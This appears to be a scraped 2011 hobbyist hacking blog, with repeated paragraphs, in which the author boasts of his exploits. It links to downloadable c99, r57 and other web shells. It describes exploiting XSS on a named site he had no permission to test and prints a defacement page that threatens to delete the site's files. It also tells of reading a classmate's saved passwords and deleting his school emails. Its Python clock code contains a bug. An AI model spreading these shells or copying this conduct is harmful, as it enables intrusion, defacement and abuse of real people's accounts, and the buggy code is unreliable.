Lately ive seen alot of people that had a hard time finding c99 shells, r57 shells, etc so I thought I would release a bunch so you guys dont have to look any further then Hackoria :D
c99: http://r57.gen.tr/c99.rar
r57: http://r57.gen.tr/r57.rar
c100: http://r57.gen.tr/c100.rar
ASP Shell: http://r57.gen.tr/cmd.rar
AJAX shell: http://r57.gen.tr/ajax.rar
MySQL Shell: http://r57.gen.tr/mysql.rar
Sunday, November 27, 2011
Simple Python Clock
Well I was bored and was playing around with some python and decided to make a simple clock. Here is the code:
import time as t
from Tkinter import *
hour = input("What is the current hour? ")
min = input("And how many minutes into the hour are me? ")
while 1:
if min < 10:
print "%s:0%s" % (hour,min)
else:
print "%s:%s" % (hour,min)
t.sleep(60)
min = min + 1
if min == 60:
min == 0
hour = hour + 1
if hour == 13:
hour = 1
Sunday, November 13, 2011
Hacking Large Companies
We see all these stories on the news of hacker teams going around hacking, and sometimes ruining these large companies. So then we have to ask ourselves, how do people go about hacking suck "secure" systems?
Well, first we have to understand things like this dont happen over night. It takes planning, sometimes months in planning.
First what they do is find out what the server is running. This can usually be done with a simple Nmap scan.
Next, the hackers create their own environment that is an exact replicate of the server they are planning to attack.
They then search for exploits, which takes quite some work. Now I'm not talking about public exploits that you find on the exploit-db im talking private exploits that are created by the hackers
Once this is complete they initiated the attack and all hell breaks loose.
This post was really because I've been getting a lot of questions lately about how this happens so I just thought I would post the process. This is also the VERY Basics of what happens behind the scense just so you get a general idea.
Well, first we have to understand things like this dont happen over night. It takes planning, sometimes months in planning.
First what they do is find out what the server is running. This can usually be done with a simple Nmap scan.
Next, the hackers create their own environment that is an exact replicate of the server they are planning to attack.
They then search for exploits, which takes quite some work. Now I'm not talking about public exploits that you find on the exploit-db im talking private exploits that are created by the hackers
Once this is complete they initiated the attack and all hell breaks loose.
This post was really because I've been getting a lot of questions lately about how this happens so I just thought I would post the process. This is also the VERY Basics of what happens behind the scense just so you get a general idea.
Steam was hacked... but how did it happen?
As you all probably know Steam was hacked, well the forums were, which allowed the hackers to access the Steam database and retrieve all types of sensitive information
So how did they do it? Lets break it down.
Steam runs an old version of vBulletin 3.8.7 I believe it is? Anyway, vBulletin has always been prone to vulnerabilities such as RFI and SQLi so Steam made a poor decision by choosing to use this forum software. Hackers then took advantage of this vulnerability and got all the information they needed.
This could have easily been avoided for two reasons, one, if they hadn't used the same MySQL server as they do for the actual Steam accounts the hackers could not have had access to the information, and two, Steam should not have been using vBulletin when better forum software like MyBB are out there.
If you have made any purchases on Steam I suggest you check your credit card more often to make sure there aren't any weird purchases on there.
So how did they do it? Lets break it down.
Steam runs an old version of vBulletin 3.8.7 I believe it is? Anyway, vBulletin has always been prone to vulnerabilities such as RFI and SQLi so Steam made a poor decision by choosing to use this forum software. Hackers then took advantage of this vulnerability and got all the information they needed.
This could have easily been avoided for two reasons, one, if they hadn't used the same MySQL server as they do for the actual Steam accounts the hackers could not have had access to the information, and two, Steam should not have been using vBulletin when better forum software like MyBB are out there.
If you have made any purchases on Steam I suggest you check your credit card more often to make sure there aren't any weird purchases on there.
Thursday, November 3, 2011
Nice python scripts
Hey, sorry I havent posted in like a month ahaha I havent had time.
Lately ive gotten back into python and ive been doing some work on a few scripts that may become useful to you.
I will try to release a new one as frequently as possible be sure to look out for those!
Lately ive gotten back into python and ive been doing some work on a few scripts that may become useful to you.
I will try to release a new one as frequently as possible be sure to look out for those!
Sunday, October 9, 2011
rustywalrus.com XSS Vulnerablity
So I was searching around google and I came across this shit site called rustywalrus.com so I thought "Hey what the heck lets see what I can do." It turns out the site is vulnerable to XSS; however, its non-persistent and I did not find a place to upload a cookie catcher so all I can do it display messages to my self :/ hey its still a hack! Here are some pics:
See? Its vulnerable!
here is my temp deface! Oh YeA!
Lol, like my deface page? It took me 5 minutes to make! Heres the code:
See? Its vulnerable!
here is my temp deface! Oh YeA!
You Were Hacked <html> <head><title>You Were Hacked</title></head><body bgcolor=black background="http://t3.gstatic.com/images?q=tbn:ANd9GcSGdXMiA99OcxPAfbaCHI7Ud5DXdZEXpoyHx81qE8MzziwRVnSLDg">
<center><br/><br/><br/><br/><br/><script language="Javascript"><!-- var tl=new Array( "Connecting...", "Injecting code...", "", "security == 0;", "", "if(security == 0){", " echo 'Admin You Fail!';", "}", "", "Admin You Fail!", "", "You were hacked by Max00355", "You made it way too easy...", "Please learn to code!" , "I am not a criminal... if anything I helped you... you should thank me!", "I will be keeping an eye on you to make sure you improve your security... if you don't all your files will be deleted...", "Check out my blog http://hackoria.blogspot.com" ); var speed=30; var index=0; text_pos=0; var str_length=tl[0].length; var contents, row;
function type_text() { contents=''; row=Math.max(0,index-9); while(row<index) contents += tl[row++] + '\r\n'; document.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + "_"; if(text_pos++==str_length) { text_pos=0; index++; if(index!=tl.length) { str_length=tl[index].length; setTimeout("type_text()",800); } } else setTimeout("type_text()",speed); } //--></script>
<form><textarea background="red"rows=10 cols=60 wrap=soft ></textarea></form>
<script language="Javascript">type_text();</script> </center></html>
Friday, October 7, 2011
Wow kids are stupid...
In my school you are aloud to bring in your laptops for work, and what not. There is this one kid who is so annoying about his Mac, bragging about it telling people how he bought it with his money what ever. Well today I asked if I could use his computer to check my grades (at this point I had no intentions of doing anything evil) When I was just about to finish what I was doing it came to me "This kids using firefox, which means I can see his passwords easily!" When I saw his passwords I kinda giggled to my self, his password was "Pokemon" with a capital P! There isnt really much I can do with this, I mean I dont really wanna ruin his facebook or anything so all I really did was delete his school emails so he cant do his homework! haha, and yes his password is the same for everything. This isn't really hacking as much as it is thinking quickly but I thought it would be a fun share.
What do you think I should do with it?
What do you think I should do with it?
Subscribe to:
Posts (Atom)